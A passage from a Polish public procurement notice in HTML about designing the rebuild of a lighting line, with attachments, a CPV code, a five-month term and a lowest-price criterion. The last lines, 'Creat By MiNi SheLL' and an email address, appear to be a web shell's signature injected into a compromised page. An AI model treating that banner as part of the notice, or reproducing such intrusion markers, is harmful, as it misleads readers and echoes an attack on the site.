2)  W przypadku wystąpienia kolizji  z istniejącym oświetleniem należy opracować projekt przebudowy linii na tym odcinku.
3) Wykonawca zobowiązany jest przed rozpoczęciem prac projektowych  do dokonania uzgodnień z Zamawiającym  proponowanych rozwiązań projektowych.

załącznik nr 14 -  kopia mapy zasadniczej  projektowanego terenu
załącznik nr 15 - mapka z zakresem opracowania.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com